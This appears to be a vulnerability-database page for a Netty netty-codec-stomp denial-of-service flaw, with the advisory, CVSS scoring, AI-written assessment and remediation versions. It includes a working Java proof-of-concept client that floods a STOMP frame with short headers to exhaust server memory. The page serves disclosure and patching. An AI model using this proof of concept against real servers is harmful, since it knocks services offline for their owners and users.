Netty CVE-2026-44891
HIGHSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Unauthenticated remote attacker sends a single crafted STOMP frame with low complexity and no user interaction, causing memory-exhaustion DoS with availability-only impact.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
3Blast Radius
ecosystem impact- 3 maven packages depend on io.netty:netty-codec-stomp (3 direct, 0 indirect)
Ecosystem-wide dependent count for version 4.2.0.Alpha1.
DescriptionGitHub Advisory
Summary
The StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, allowing an attacker to cause an OutOfMemoryError, leading to a Denial of Service.
Details
io.netty.handler.codec.stomp.StompSubframeDecoder implements the STOMP protocol. The maxLineLength parameter restricts the length of individual header lines, but there is no mechanism to limit the total number of headers in a single STOMP frame. An attacker can send a large number of short headers (e.g., a: 1\n), which are accumulated in memory inside the DefaultStompHeadersSubframe until the JVM throws an OutOfMemoryError.
PoC
Run the server with -Xmx256m
public final class ServerApp {
public static void main(String[] args) throws Exception {
EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
try {
ChannelFuture serverFuture = new ServerBootstrap()
.group(group)
.channel(NioServerSocketChannel.class)
.childHandler(new StompSubframeDecoder())
.bind(8080)
.sync();
serverFuture.channel().closeFuture().sync();
} finally {
group.shutdownGracefully();
}
}
}public final class ClientApp {
public static void main(String[] args) throws Exception {
try (Socket socket = new Socket("127.0.0.1", 8080)) {
OutputStream out = socket.getOutputStream();
out.write("CONNECT\n".getBytes(StandardCharsets.UTF_8));
StringBuilder sb = new StringBuilder();
for (int i = 0; i < 1000; i++) {
sb.append("a:1\n");
}
byte[] bulkHeaders = sb.toString().getBytes(StandardCharsets.UTF_8);
for (int i = 1; i <= 50_000; i++) {
out.write(bulkHeaders);
}
} catch (Exception e) {
e.printStackTrace();
}
}
}Impact
Denial of Service: An attacker can easily exhaust the server's memory by sending a single malicious STOMP message. Any server exposing a STOMP endpoint based on StompSubframeDecoder is vulnerable to DoS.
Articles & Coverage 1
AnalysisAI
Denial of service in the Netty netty-codec-stomp module (versions 4.1.x up to 4.1.135.Final and 4.2.0.Alpha1 through 4.2.15.Final) allows a remote attacker to trigger an OutOfMemoryError and crash the JVM. The StompSubframeDecoder caps individual header line length via maxLineLength but never bounds the total header count or cumulative header size, so a single STOMP frame packed with thousands of short headers exhausts heap memory. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the target application actually deploys io.netty.handler.codec.stomp.StompSubframeDecoder on a network-reachable STOMP endpoint - that specific decoder in the pipeline is the concrete prerequisite. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The supplied CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, base 7.5) is internally consistent with the description: an unauthenticated (PR:N) remote (AV:N) attacker with no user interaction (UI:N) can reliably cause an availability-only impact (C:N/I:N/A:H) with low complexity (AC:L). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker opens a TCP connection to a service exposing a StompSubframeDecoder-based STOMP endpoint and sends a single STOMP frame stuffed with an enormous number of tiny headers (e.g. repeating 'a:1\n'). … |
| Remediation | Vendor-released patch: upgrade to 4.2.16.Final on the 4.2 branch, or to 4.1.136.Final on the 4.1 branch, per the Netty advisory GHSA-vhch-2wf3-m8rp (https://github.com/netty/netty/security/advisories/GHSA-vhch-2wf3-m8rp). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours, identify all applications and services using netty-codec-stomp module and document which versions are deployed; determine external exposure and connectivity patterns. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m
Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti
Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent
Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug
JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up
Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up
The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow
Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla
The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during
Same weakness CWE-400 – Uncontrolled Resource Consumption
View allSame technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-vhch-2wf3-m8rp